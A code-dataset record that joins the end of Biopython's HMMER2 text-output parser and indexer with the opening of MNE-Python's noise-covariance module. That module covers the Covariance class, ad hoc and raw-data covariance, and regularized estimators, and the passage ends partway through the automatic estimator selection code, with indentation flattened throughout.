qresult.target = self._meta.get('target')
qresult.version = self._meta.get('version')
yield qresult
def read_next(self, rstrip=True):
"""Return the next non-empty line, trailing whitespace removed"""
if len(self.buf) > 0:
return self.buf.pop()
self.line = self.handle.readline()
while self.line and rstrip and not self.line.strip():
self.line = self.handle.readline()
if self.line:
if rstrip:
self.line = self.line.rstrip()
return self.line
def push_back(self, line):
"""Un-read a line that should not be parsed yet"""
self.buf.append(line)
def parse_key_value(self):
"""Parse key-value pair separated by colon (:)"""
key, value = self.line.split(':', 1)
return key.strip(), value.strip()
def parse_preamble(self):
"""Parse HMMER2 preamble."""
meta = {}
state = "GENERIC"
while self.read_next():
if state == "GENERIC":
if self.line.startswith('hmm'):
meta['program'] = self.line.split('-')[0].strip()
elif self.line.startswith('HMMER is'):
continue
elif self.line.startswith('HMMER'):
meta['version'] = self.line.split()[1]
elif self.line.count('-') == 36:
state = "OPTIONS"
continue
assert state == "OPTIONS"
assert 'program' in meta
if self.line.count('-') == 32:
break
key, value = self.parse_key_value()
if meta['program'] == 'hmmsearch':
if key == 'Sequence database':
meta['target'] = value
continue
elif meta['program'] == 'hmmpfam':
if key == 'HMM file':
meta['target'] = value
continue
meta[key] = value
return meta
def parse_qresult(self):
"""Parse a HMMER2 query block."""
while self.read_next():
if not self.line.startswith('Query'):
raise StopIteration()
_, id_ = self.parse_key_value()
self.qresult = QueryResult(id=id_)
description = None
while self.read_next() and not self.line.startswith('Scores'):
if self.line.startswith('Accession'):
self.qresult.accession = self.parse_key_value()[1]
if self.line.startswith('Description'):
description = self.parse_key_value()[1]
hit_placeholders = self.parse_hits()
if len(hit_placeholders) > 0:
self.parse_hsps(hit_placeholders)
self.parse_hsp_alignments()
while not self.line.startswith('Query'):
self.read_next()
if not self.line:
break
self.buf.append(self.line)
if description is not None:
self.qresult.description = description
yield self.qresult
def parse_hits(self):
"""Parse a HMMER2 hit block, beginning with the hit table."""
hit_placeholders = []
while self.read_next():
if self.line.startswith('Parsed'):
break
if self.line.find('no hits') > -1:
break
if self.line.startswith('Sequence') or \
self.line.startswith('Model') or \
self.line.startswith('-------- '):
continue
fields = self.line.split()
id_ = fields.pop(0)
domain_obs_num = int(fields.pop())
evalue = float(fields.pop())
bitscore = float(fields.pop())
description = ' '.join(fields).strip()
hit = _HitPlaceholder()
hit.id_ = id_
hit.evalue = evalue
hit.bitscore = bitscore
hit.description = description
hit.domain_obs_num = domain_obs_num
hit_placeholders.append(hit)
return hit_placeholders
def parse_hsps(self, hit_placeholders):
"""Parse a HMMER2 hsp block, beginning with the hsp table."""
# HSPs may occur in different order than the hits
# so store Hit objects separately first
unordered_hits = {}
while self.read_next():
if self.line.startswith('Alignments') or \
self.line.startswith('Histogram') or \
self.line == '//':
break
if self.line.startswith('Model') or \
self.line.startswith('Sequence') or \
self.line.startswith('--------'):
continue
id_, domain, seq_f, seq_t, seq_compl, hmm_f, hmm_t, hmm_compl, \
score, evalue = self.line.split()
frag = HSPFragment(id_, self.qresult.id)
frag.alphabet = generic_protein
if self._meta['program'] == 'hmmpfam':
frag.hit_start = int(hmm_f) - 1
frag.hit_end = int(hmm_t)
frag.query_start = int(seq_f) - 1
frag.query_end = int(seq_t)
elif self._meta['program'] == 'hmmsearch':
frag.query_start = int(hmm_f) - 1
frag.query_end = int(hmm_t)
frag.hit_start = int(seq_f) - 1
frag.hit_end = int(seq_t)
hsp = HSP([frag])
hsp.evalue = float(evalue)
hsp.bitscore = float(score)
hsp.domain_index = int(domain.split('/')[0])
if self._meta['program'] == 'hmmpfam':
hsp.hit_endtype = hmm_compl
hsp.query_endtype = seq_compl
elif self._meta['program'] == 'hmmsearch':
hsp.query_endtype = hmm_compl
hsp.hit_endtype = seq_compl
if id_ not in unordered_hits:
placeholder = [p for p in hit_placeholders if p.id_ == id_][0]
hit = placeholder.createHit([hsp])
unordered_hits[id_] = hit
else:
hit = unordered_hits[id_]
hsp.hit_description = hit.description
hit.append(hsp)
# The placeholder list is in the correct order, so use that order for
# the Hit objects in the qresult
for p in hit_placeholders:
self.qresult.append(unordered_hits[p.id_])
def parse_hsp_alignments(self):
"""Parse a HMMER2 HSP alignment block."""
if not self.line.startswith('Alignments'):
return
while self.read_next():
if self.line == '//' or self.line.startswith('Histogram'):
break
match = re.search(_HSP_ALIGN_LINE, self.line)
if match is None:
continue
id_ = match.group(1)
idx = int(match.group(2))
num = int(match.group(3))
hit = self.qresult[id_]
if hit.domain_obs_num != num:
continue
frag = hit[idx - 1][0]
hmmseq = ''
consensus = ''
otherseq = ''
structureseq = ''
pad = 0
while self.read_next() and self.line.startswith(' '):
# if there's structure information, parse that
if self.line[16:18] == 'CS':
structureseq += self.line[19:].strip()
if not self.read_next():
break
# skip the *-> start marker if it exists
if self.line[19] == '*':
seq = self.line[22:]
pad = 3
else:
seq = self.line[19:]
pad = 0
# get rid of the end marker
if seq.endswith('<-*'):
seq = seq[:-3]
hmmseq += seq
line_len = len(seq)
if not self.read_next(rstrip=False):
break
consensus += self.line[19 + pad:19 + pad + line_len]
# If there's no consensus sequence, hmmer2 doesn't
# bother to put spaces here, so add extra padding
extra_padding = len(hmmseq) - len(consensus)
consensus += ' ' * extra_padding
if not self.read_next():
break
otherseq += self.line[19:].split()[0].strip()
self.push_back(self.line)
# add similarity sequence to annotation
frag.aln_annotation['similarity'] = consensus
# if there's structure information, add it to the fragment
if structureseq:
frag.aln_annotation['CS'] = structureseq
if self._meta['program'] == 'hmmpfam':
frag.hit = hmmseq
frag.query = otherseq
else:
frag.hit = otherseq
frag.query = hmmseq
class Hmmer2TextIndexer(_BaseHmmerTextIndexer):
"""Indexer for hmmer2-text format."""
_parser = Hmmer2TextParser
qresult_start = _as_bytes('Query')
# qresults_ends for hmmpfam and hmmsearch
# need to anticipate both since hmmsearch have different query end mark
qresult_end = _as_bytes('//')
def __iter__(self):
handle = self._handle
handle.seek(0)
start_offset = handle.tell()
regex_id = re.compile(_as_bytes(r'Query\s*(?:sequence|HMM)?:\s*(.*)'))
# determine flag for hmmsearch
is_hmmsearch = False
line = read_forward(handle)
if line.startswith(_as_bytes('hmmsearch')):
is_hmmsearch = True
while True:
end_offset = handle.tell()
if line.startswith(self.qresult_start):
regx = re.search(regex_id, line)
qresult_key = regx.group(1).strip()
# qresult start offset is the offset of this line
# (starts with the start mark)
start_offset = end_offset - len(line)
elif line.startswith(self.qresult_end):
yield _bytes_to_string(qresult_key), start_offset, 0
start_offset = end_offset
elif not line:
# HACK: since hmmsearch can only have one query result
if is_hmmsearch:
yield _bytes_to_string(qresult_key), start_offset, 0
break
line = read_forward(handle)
# if not used as a module, run the doctest
if __name__ == "__main__":
from Bio._utils import run_doctest
run_doctest()
|
zjuchenyuan/BioWeb
|
Lib/Bio/SearchIO/HmmerIO/hmmer2_text.py
|
Python
|
mit
| 12,055
|
[
"Biopython"
] |
99da5763519dd548e67e3cc83a4ced8f5efef90cb49a190947cf7c566b6fa989
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis A. Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import copy as cp
import os
from math import floor, ceil, log
import itertools as itt
import warnings
import six
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from .io.write import start_file, end_file
from .io.proj import (make_projector, _proj_equal, activate_proj,
_has_eeg_average_ref_proj)
from .io import fiff_open
from .io.pick import (pick_types, channel_indices_by_type, pick_channels_cov,
pick_channels, pick_info, _picks_by_type)
from .io.constants import FIFF
from .io.meas_info import read_bad_channels
from .io.proj import _read_proj, _write_proj
from .io.tag import find_tag
from .io.tree import dir_tree_find
from .io.write import (start_block, end_block, write_int, write_name_list,
write_double, write_float_matrix, write_string)
from .defaults import _handle_default
from .epochs import _is_good
from .utils import (check_fname, logger, verbose, estimate_rank,
_compute_row_norms, check_sklearn_version, _time_mask)
from .externals.six.moves import zip
from .externals.six import string_types
def _check_covs_algebra(cov1, cov2):
if cov1.ch_names != cov2.ch_names:
raise ValueError('Both Covariance do not have the same list of '
'channels.')
projs1 = [str(c) for c in cov1['projs']]
projs2 = [str(c) for c in cov1['projs']]
if projs1 != projs2:
raise ValueError('Both Covariance do not have the same list of '
'SSP projections.')
def _get_tslice(epochs, tmin, tmax):
"""get the slice."""
tstart, tend = None, None
mask = _time_mask(epochs.times, tmin, tmax)
tstart = np.where(mask)[0][0] if tmin is not None else None
tend = np.where(mask)[0][-1] + 1 if tmax is not None else None
tslice = slice(tstart, tend, None)
return tslice
class Covariance(dict):
"""Noise covariance matrix.
Parameters
----------
fname : string
The name of the raw file.
Attributes
----------
data : array of shape (n_channels, n_channels)
The covariance.
ch_names : list of string
List of channels' names.
nfree : int
Number of degrees of freedom i.e. number of time points used.
"""
def __init__(self, fname):
"""Init of covariance."""
if fname is None:
return
# Reading
fid, tree, _ = fiff_open(fname)
self.update(_read_cov(fid, tree, FIFF.FIFFV_MNE_NOISE_COV))
fid.close()
@property
def data(self):
"""Numpy array of Noise covariance matrix."""
return self['data']
@property
def ch_names(self):
"""Channel names."""
return self['names']
@property
def nfree(self):
"""Number of degrees of freedom."""
return self['nfree']
def save(self, fname):
"""Save covariance matrix in a FIF file.
Parameters
----------
fname : str
Output filename.
"""
check_fname(fname, 'covariance', ('-cov.fif', '-cov.fif.gz'))
fid = start_file(fname)
try:
_write_cov(fid, self)
except Exception as inst:
os.remove(fname)
raise inst
end_file(fid)
def as_diag(self, copy=True):
"""Set covariance to be processed as being diagonal.
Parameters
----------
copy : bool
If True, return a modified copy of the covarince. If False,
the covariance is modified in place.
Returns
-------
cov : dict
The covariance.
Notes
-----
This function allows creation of inverse operators
equivalent to using the old "--diagnoise" mne option.
"""
if self['diag'] is True:
return self.copy() if copy is True else self
if copy is True:
cov = cp.deepcopy(self)
else:
cov = self
cov['diag'] = True
cov['data'] = np.diag(cov['data'])
cov['eig'] = None
cov['eigvec'] = None
return cov
def __repr__(self):
if self.data.ndim == 2:
s = 'size : %s x %s' % self.data.shape
else: # ndim == 1
s = 'diagonal : %s' % self.data.size
s += ", n_samples : %s" % self.nfree
s += ", data : %s" % self.data
return "<Covariance | %s>" % s
def __add__(self, cov):
"""Add Covariance taking into account number of degrees of freedom."""
_check_covs_algebra(self, cov)
this_cov = cp.deepcopy(cov)
this_cov['data'] = (((this_cov['data'] * this_cov['nfree']) +
(self['data'] * self['nfree'])) /
(self['nfree'] + this_cov['nfree']))
this_cov['nfree'] += self['nfree']
this_cov['bads'] = list(set(this_cov['bads']).union(self['bads']))
return this_cov
def __iadd__(self, cov):
"""Add Covariance taking into account number of degrees of freedom."""
_check_covs_algebra(self, cov)
self['data'][:] = (((self['data'] * self['nfree']) +
(cov['data'] * cov['nfree'])) /
(self['nfree'] + cov['nfree']))
self['nfree'] += cov['nfree']
self['bads'] = list(set(self['bads']).union(cov['bads']))
return self
@verbose
def plot(self, info, exclude=[], colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
info: dict
Measurement info.
exclude : list of string | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Call pyplot.show() as the end or not.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
fig_cov : instance of matplotlib.pyplot.Figure
The covariance plot.
fig_svd : instance of matplotlib.pyplot.Figure | None
The SVD spectra plot of the covariance.
"""
from .viz.misc import plot_cov
return plot_cov(self, info, exclude, colorbar, proj, show_svd, show)
###############################################################################
# IO
@verbose
def read_cov(fname, verbose=None):
"""Read a noise covariance from a FIF file.
Parameters
----------
fname : string
The name of file containing the covariance matrix. It should end with
-cov.fif or -cov.fif.gz.
verbose : bool, str, int, or None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : Covariance
The noise covariance matrix.
See Also
--------
write_cov, compute_covariance, compute_raw_data_covariance
"""
check_fname(fname, 'covariance', ('-cov.fif', '-cov.fif.gz'))
return Covariance(fname)
###############################################################################
# Estimate from data
@verbose
def make_ad_hoc_cov(info, verbose=None):
"""Create an ad hoc noise covariance.
Parameters
----------
info : instance of mne.io.meas_info.Info
Measurement info.
verbose : bool, str, int, or None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance
The ad hoc diagonal noise covariance for the M/EEG data channels.
Notes
-----
.. versionadded:: 0.9.0
"""
info = pick_info(info, pick_types(info, meg=True, eeg=True))
info._check_consistency()
# Standard deviations to be used
grad_std = 5e-13
mag_std = 20e-15
eeg_std = 0.2e-6
logger.info('Using standard noise values '
'(MEG grad : %6.1f fT/cm MEG mag : %6.1f fT EEG : %6.1f uV)'
% (1e13 * grad_std, 1e15 * mag_std, 1e6 * eeg_std))
data = np.zeros(len(info['ch_names']))
for meg, eeg, val in zip(('grad', 'mag', False), (False, False, True),
(grad_std, mag_std, eeg_std)):
data[pick_types(info, meg=meg, eeg=eeg)] = val * val
cov = Covariance(None)
cov.update(kind=FIFF.FIFFV_MNE_NOISE_COV, diag=True, dim=len(data),
names=info['ch_names'], data=data, projs=info['projs'],
bads=info['bads'], nfree=0, eig=None, eigvec=None,
info=info)
return cov
def _check_n_samples(n_samples, n_chan):
"""Check to see if there are enough samples for reliable cov calc."""
n_samples_min = 10 * (n_chan + 1) // 2
if n_samples <= 0:
raise ValueError('No samples found to compute the covariance matrix')
if n_samples < n_samples_min:
text = ('Too few samples (required : %d got : %d), covariance '
'estimate may be unreliable' % (n_samples_min, n_samples))
warnings.warn(text)
logger.warning(text)
@verbose
def compute_raw_data_covariance(raw, tmin=None, tmax=None, tstep=0.2,
reject=None, flat=None, picks=None,
verbose=None):
"""Estimate noise covariance matrix from a continuous segment of raw data.
It is typically useful to estimate a noise covariance
from empty room data or time intervals before starting
the stimulation.
Note: To speed up the computation you should consider preloading raw data
by setting preload=True when reading the Raw data.
Parameters
----------
raw : instance of Raw
Raw data
tmin : float | None (default None)
Beginning of time interval in seconds
tmax : float | None (default None)
End of time interval in seconds
tstep : float (default 0.2)
Length of data chunks for artefact rejection in seconds.
reject : dict | None (default None)
Rejection parameters based on peak-to-peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # uV (EEG channels)
eog=250e-6 # uV (EOG channels)
)
flat : dict | None (default None)
Rejection parameters based on flatness of signal.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg', and values
are floats that set the minimum acceptable peak-to-peak amplitude.
If flat is None then no rejection is done.
picks : array-like of int | None (default None)
Indices of channels to include (if None, all channels
except bad channels are used).
verbose : bool | str | int | None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance
Noise covariance matrix.
See Also
--------
compute_covariance : Estimate noise covariance matrix from epochs
"""
sfreq = raw.info['sfreq']
# Convert to samples
start = 0 if tmin is None else int(floor(tmin * sfreq))
if tmax is None:
stop = int(raw.last_samp - raw.first_samp)
else:
stop = int(ceil(tmax * sfreq))
step = int(ceil(tstep * raw.info['sfreq']))
# don't exclude any bad channels, inverses expect all channels present
if picks is None:
picks = pick_types(raw.info, meg=True, eeg=True, eog=False,
ref_meg=False, exclude=[])
data = 0
n_samples = 0
mu = 0
info = pick_info(raw.info, picks)
idx_by_type = channel_indices_by_type(info)
# Read data in chuncks
for first in range(start, stop, step):
last = first + step
if last >= stop:
last = stop
raw_segment, times = raw[picks, first:last]
if _is_good(raw_segment, info['ch_names'], idx_by_type, reject, flat,
ignore_chs=info['bads']):
mu += raw_segment.sum(axis=1)
data += np.dot(raw_segment, raw_segment.T)
n_samples += raw_segment.shape[1]
else:
logger.info("Artefact detected in [%d, %d]" % (first, last))
_check_n_samples(n_samples, len(picks))
mu /= n_samples
data -= n_samples * mu[:, None] * mu[None, :]
data /= (n_samples - 1.0)
logger.info("Number of samples used : %d" % n_samples)
logger.info('[done]')
cov = Covariance(None)
ch_names = [raw.info['ch_names'][k] for k in picks]
# XXX : do not compute eig and eigvec now (think it's better...)
eig = None
eigvec = None
# Store structure for fif
cov.update(kind=FIFF.FIFFV_MNE_NOISE_COV, diag=False, dim=len(data),
names=ch_names, data=data,
projs=cp.deepcopy(raw.info['projs']),
bads=raw.info['bads'], nfree=n_samples, eig=eig,
eigvec=eigvec)
return cov
@verbose
def compute_covariance(epochs, keep_sample_mean=True, tmin=None, tmax=None,
projs=None, method='empirical', method_params=None,
cv=3, scalings=None, n_jobs=1, return_estimators=False,
verbose=None):
"""Estimate noise covariance matrix from epochs.
The noise covariance is typically estimated on pre-stim periods
when the stim onset is defined from events.
If the covariance is computed for multiple event types (events
with different IDs), the following two options can be used and combined.
A) either an Epochs object for each event type is created and
a list of Epochs is passed to this function.
B) an Epochs object is created for multiple events and passed
to this function.
Note: Baseline correction should be used when creating the Epochs.
Otherwise the computed covariance matrix will be inaccurate.
Note: For multiple event types, it is also possible to create a
single Epochs object with events obtained using
merge_events(). However, the resulting covariance matrix
will only be correct if keep_sample_mean is True.
Note: The covariance can be unstable if the number of samples is not
sufficient. In that case it is common to regularize a covariance
estimate. The ``method`` parameter of this function allows to
regularize the covariance in an automated way. It also allows
to select between different alternative estimation algorithms which
themselves achieve regularization. Details are described in [1].
Parameters
----------
epochs : instance of Epochs, or a list of Epochs objects
The epochs.
keep_sample_mean : bool (default true)
If False, the average response over epochs is computed for
each event type and subtracted during the covariance
computation. This is useful if the evoked response from a
previous stimulus extends into the baseline period of the next.
Note. This option is only implemented for method='empirical'.
tmin : float | None (default None)
Start time for baseline. If None start at first sample.
tmax : float | None (default None)
End time for baseline. If None end at last sample.
projs : list of Projection | None (default None)
List of projectors to use in covariance calculation, or None
to indicate that the projectors from the epochs should be
inherited. If None, then projectors from all epochs must match.
method : str | list | None (default 'empirical')
The method used for covariance estimation. If 'empirical' (default),
the sample covariance will be computed. A list can be passed to run a
set of the different methods.
If 'auto' or a list of methods, the best estimator will be determined
based on log-likelihood and cross-validation on unseen data as
described in ref. [1]. Valid methods are:
'empirical', the empirical or sample covariance,
'diagonal_fixed', a diagonal regularization as in mne.cov.regularize
(see MNE manual), 'ledoit_wolf', the Ledoit-Wolf estimator (see [2]),
'shrunk' like 'ledoit_wolf' with cross-validation for optimal alpha
(see scikit-learn documentation on covariance estimation), 'pca',
probabilistic PCA with low rank
(see [3]), and, 'factor_analysis', Factor Analysis with low rank
(see [4]). If 'auto', expands to::
['shrunk', 'diagonal_fixed', 'empirical', 'factor_analysis']
Note. 'ledoit_wolf' and 'pca' are similar to 'shrunk' and
'factor_analysis', respectively. They are not included to avoid
redundancy. In most cases 'shrunk' and 'factor_analysis' represent
more appropriate default choices.
.. versionadded:: 0.9.0
method_params : dict | None (default None)
Additional parameters to the estimation procedure. Only considered if
method is not None. Keys must correspond to the value(s) of `method`.
If None (default), expands to::
'empirical': {'store_precision': False, 'assume_centered': True},
'diagonal_fixed': {'grad': 0.01, 'mag': 0.01, 'eeg': 0.0,
'store_precision': False,
'assume_centered': True},
'ledoit_wolf': {'store_precision': False, 'assume_centered': True},
'shrunk': {'shrinkage': np.logspace(-4, 0, 30),
'store_precision': False, 'assume_centered': True},
'pca': {'iter_n_components': None},
'factor_analysis': {'iter_n_components': None}
cv : int | sklearn cross_validation object (default 3)
The cross validation method. Defaults to 3, which will
internally trigger a default 3-fold shuffle split.
scalings : dict | None (default None)
Defaults to ``dict(mag=1e15, grad=1e13, eeg=1e6)``.
These defaults will scale magnetometers and gradiometers
at the same unit.
n_jobs : int (default 1)
Number of jobs to run in parallel.
return_estimators : bool (default False)
Whether to return all estimators or the best. Only considered if
method equals 'auto' or is a list of str. Defaults to False
verbose : bool | str | int | or None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance | list
The computed covariance. If method equals 'auto' or is a list of str
and return_estimators equals True, a list of covariance estimators is
returned (sorted by log-likelihood, from high to low, i.e. from best
to worst).
See Also
--------
compute_raw_data_covariance : Estimate noise covariance from raw data
References
----------
[1] Engemann D. and Gramfort A. (2015) Automated model selection in
covariance estimation and spatial whitening of MEG and EEG signals,
vol. 108, 328-342, NeuroImage.
[2] Ledoit, O., Wolf, M., (2004). A well-conditioned estimator for
large-dimensional covariance matrices. Journal of Multivariate
Analysis 88 (2), 365 - 411.
[3] Tipping, M. E., Bishop, C. M., (1999). Probabilistic principal
component analysis. Journal of the Royal Statistical Society: Series
B (Statistical Methodology) 61 (3), 611 - 622.
[4] Barber, D., (2012). Bayesian reasoning and machine learning.
Cambridge University Press., Algorithm 21.1
"""
accepted_methods = ('auto', 'empirical', 'diagonal_fixed', 'ledoit_wolf',
'shrunk', 'pca', 'factor_analysis',)
msg = ('Invalid method ({method}). Accepted values (individually or '
'in a list) are "%s"' % '" or "'.join(accepted_methods + ('None',)))
# scale to natural unit for best stability with MEG/EEG
if isinstance(scalings, dict):
for k, v in scalings.items():
if k not in ('mag', 'grad', 'eeg'):
raise ValueError('The keys in `scalings` must be "mag" or'
'"grad" or "eeg". You gave me: %s' % k)
scalings = _handle_default('scalings', scalings)
_method_params = {
'empirical': {'store_precision': False, 'assume_centered': True},
'diagonal_fixed': {'grad': 0.01, 'mag': 0.01, 'eeg': 0.0,
'store_precision': False, 'assume_centered': True},
'ledoit_wolf': {'store_precision': False, 'assume_centered': True},
'shrunk': {'shrinkage': np.logspace(-4, 0, 30),
'store_precision': False, 'assume_centered': True},
'pca': {'iter_n_components': None},
'factor_analysis': {'iter_n_components': None}
}
if isinstance(method_params, dict):
for key, values in method_params.items():
if key not in _method_params:
raise ValueError('key (%s) must be "%s"' %
(key, '" or "'.join(_method_params)))
_method_params[key].update(method_params[key])
# for multi condition support epochs is required to refer to a list of
# epochs objects
def _unpack_epochs(epochs):
if len(epochs.event_id) > 1:
epochs = [epochs[k] for k in epochs.event_id]
else:
epochs = [epochs]
return epochs
if not isinstance(epochs, list):
epochs = _unpack_epochs(epochs)
else:
epochs = sum([_unpack_epochs(epoch) for epoch in epochs], [])
# check for baseline correction
for epochs_t in epochs:
if epochs_t.baseline is None and epochs_t.info['highpass'] < 0.5:
warnings.warn('Epochs are not baseline corrected, covariance '
'matrix may be inaccurate')
for epoch in epochs:
epoch.info._check_consistency()
bads = epochs[0].info['bads']
if projs is None:
projs = cp.deepcopy(epochs[0].info['projs'])
# make sure Epochs are compatible
for epochs_t in epochs[1:]:
if epochs_t.proj != epochs[0].proj:
raise ValueError('Epochs must agree on the use of projections')
for proj_a, proj_b in zip(epochs_t.info['projs'], projs):
if not _proj_equal(proj_a, proj_b):
raise ValueError('Epochs must have same projectors')
else:
projs = cp.deepcopy(projs)
ch_names = epochs[0].ch_names
# make sure Epochs are compatible
for epochs_t in epochs[1:]:
if epochs_t.info['bads'] != bads:
raise ValueError('Epochs must have same bad channels')
if epochs_t.ch_names != ch_names:
raise ValueError('Epochs must have same channel names')
picks_list = _picks_by_type(epochs[0].info)
picks_meeg = np.concatenate([b for _, b in picks_list])
picks_meeg = np.sort(picks_meeg)
ch_names = [epochs[0].ch_names[k] for k in picks_meeg]
info = epochs[0].info # we will overwrite 'epochs'
if method == 'auto':
method = ['shrunk', 'diagonal_fixed', 'empirical', 'factor_analysis']
if not isinstance(method, (list, tuple)):
method = [method]
ok_sklearn = check_sklearn_version('0.15') is True
if not ok_sklearn and (len(method) != 1 or method[0] != 'empirical'):
raise ValueError('scikit-learn is not installed, `method` must be '
'`empirical`')
if keep_sample_mean is False:
if len(method) != 1 or 'empirical' not in method:
raise ValueError('`keep_sample_mean=False` is only supported'
'with `method="empirical"`')
for p, v in _method_params.items():
if v.get('assume_centered', None) is False:
raise ValueError('`assume_centered` must be True'
' if `keep_sample_mean` is False')
# prepare mean covs
n_epoch_types = len(epochs)
data_mean = list(np.zeros(n_epoch_types))
n_samples = np.zeros(n_epoch_types, dtype=np.int)
n_epochs = np.zeros(n_epoch_types, dtype=np.int)
for ii, epochs_t in enumerate(epochs):
tslice = _get_tslice(epochs_t, tmin, tmax)
for e in epochs_t:
e = e[picks_meeg, tslice]
if not keep_sample_mean:
data_mean[ii] += e
n_samples[ii] += e.shape[1]
n_epochs[ii] += 1
n_samples_epoch = n_samples // n_epochs
norm_const = np.sum(n_samples_epoch * (n_epochs - 1))
data_mean = [1.0 / n_epoch * np.dot(mean, mean.T) for n_epoch, mean
in zip(n_epochs, data_mean)]
if not all(k in accepted_methods for k in method):
raise ValueError(msg.format(method=method))
info = pick_info(info, picks_meeg)
tslice = _get_tslice(epochs[0], tmin, tmax)
epochs = [ee.get_data()[:, picks_meeg, tslice] for ee in epochs]
picks_meeg = np.arange(len(picks_meeg))
picks_list = _picks_by_type(info)
if len(epochs) > 1:
epochs = np.concatenate(epochs, 0)
else:
epochs = epochs[0]
epochs = np.hstack(epochs)
n_samples_tot = epochs.shape[-1]
_check_n_samples(n_samples_tot, len(picks_meeg))
epochs = epochs.T # sklearn | C-order
if ok_sklearn:
cov_data = _compute_covariance_auto(epochs, method=method,
method_params=_method_params,
info=info,
verbose=verbose,
cv=cv,
n_jobs=n_jobs,
# XXX expose later
stop_early=True, # if needed.
picks_list=picks_list,
scalings=scalings)
else:
if _method_params['empirical']['assume_centered'] is True:
cov = epochs.T.dot(epochs) / n_samples_tot
else:
cov = np.cov(epochs.T, bias=1)
cov_data = {'empirical': {'data': cov}}
if keep_sample_mean is False:
cov = cov_data['empirical']['data']
# undo scaling
cov *= n_samples_tot
# ... apply pre-computed class-wise normalization
for mean_cov in data_mean:
cov -= mean_cov
cov /= norm_const
covs = list()
for this_method, data in cov_data.items():
cov = Covariance(None)
cov.update(kind=1, diag=False, dim=len(data['data']), names=ch_names,
data=data.pop('data'), projs=projs, bads=info['bads'],
nfree=n_samples_tot, eig=None, eigvec=None)
logger.info('Number of samples used : %d' % n_samples_tot)
logger.info('[done]')
# add extra info
cov.update(method=this_method, **data)
covs.append(cov)
if ok_sklearn:
msg = ['log-likelihood on unseen data (descending order):']
logliks = [(c['method'], c['loglik']) for c in covs]
logliks.sort(reverse=True, key=lambda c: c[1])
for k, v in logliks:
msg.append('%s: %0.3f' % (k, v))
logger.info('\n '.join(msg))
if ok_sklearn and not return_estimators:
keys, scores = zip(*[(c['method'], c['loglik']) for c in covs])
out = covs[np.argmax(scores)]
logger.info('selecting best estimator: {0}'.format(out['method']))
elif ok_sklearn:
out = covs
out.sort(key=lambda c: c['loglik'], reverse=True)
else:
out = covs[0]
return out
def _compute_covariance_auto(data, method, info, method_params, cv,
scalings, n_jobs, stop_early, picks_list,
verbose):
"""docstring for _compute_covariance_auto."""
from sklearn.grid_search import GridSearchCV
from sklearn.covariance import (LedoitWolf, ShrunkCovariance,
EmpiricalCovariance)
# rescale to improve numerical stability
_apply_scaling_array(data.T, picks_list=picks_list, scalings=scalings)
estimator_cov_info = list()
msg = 'Estimating covariance using %s'
_RegCovariance, _ShrunkCovariance = _get_covariance_classes()
for this_method in method:
data_ = data.copy()
name = this_method.__name__ if callable(this_method) else this_method
logger.info(msg % name.upper())
if this_method == 'empirical':
est = EmpiricalCovariance(**method_params[this_method])
est.fit(data_)
_info = None
estimator_cov_info.append((est, est.covariance_, _info))
elif this_method == 'diagonal_fixed':
est = _RegCovariance(info=info, **method_params[this_method])
est.fit(data_)
_info = None
estimator_cov_info.append((est, est.covariance_, _info))
elif this_method == 'ledoit_wolf':
shrinkages = []
lw = LedoitWolf(**method_params[this_method])
for ch_type, picks in picks_list:
lw.fit(data_[:, picks])
shrinkages.append((
ch_type,
lw.shrinkage_,
picks
))
sc = _ShrunkCovariance(shrinkage=shrinkages,
**method_params[this_method])
sc.fit(data_)
_info = None
estimator_cov_info.append((sc, sc.covariance_, _info))
elif this_method == 'shrunk':
shrinkage = method_params[this_method].pop('shrinkage')
tuned_parameters = [{'shrinkage': shrinkage}]
shrinkages = []
gs = GridSearchCV(ShrunkCovariance(**method_params[this_method]),
tuned_parameters, cv=cv)
for ch_type, picks in picks_list:
gs.fit(data_[:, picks])
shrinkages.append((
ch_type,
gs.best_estimator_.shrinkage,
picks
))
shrinkages = [c[0] for c in zip(shrinkages)]
sc = _ShrunkCovariance(shrinkage=shrinkages,
**method_params[this_method])
sc.fit(data_)
_info = None
estimator_cov_info.append((sc, sc.covariance_, _info))
elif this_method == 'pca':
mp = method_params[this_method]
pca, _info = _auto_low_rank_model(data_, this_method,
n_jobs=n_jobs,
method_params=mp, cv=cv,
stop_early=stop_early)
pca.fit(data_)
estimator_cov_info.append((pca, pca.get_covariance(), _info))
elif this_method == 'factor_analysis':
mp = method_params[this_method]
fa, _info = _auto_low_rank_model(data_, this_method, n_jobs=n_jobs,
method_params=mp, cv=cv,
stop_early=stop_early)
fa.fit(data_)
estimator_cov_info.append((fa, fa.get_covariance(), _info))
else:
raise ValueError('Oh no! Your estimator does not have'
' a .fit method')
logger.info('Done.')
logger.info('Using cross-validation to select the best estimator.')
estimators, _, _ = zip(*estimator_cov_info)
logliks = np.array([_cross_val(data, e, cv, n_jobs) for e in estimators])
# undo scaling
for c in estimator_cov_info:
_undo_scaling_cov(c[1], picks_list, scalings)
out = dict()
estimators, covs, runtime_infos = zip(*estimator_cov_info)
cov_methods = [c.__name__ if callable(c) else c for c in method]
runtime_infos, covs = list(runtime_infos), list(covs)
my_zip = zip(cov_methods, runtime_infos, logliks, covs, estimators)
for this_method, runtime_info, loglik, data, est in my_zip:
out[this_method] = {'loglik': loglik, 'data': data, 'estimator': est}
if runtime_info is not None:
out[this_method].update(runtime_info)
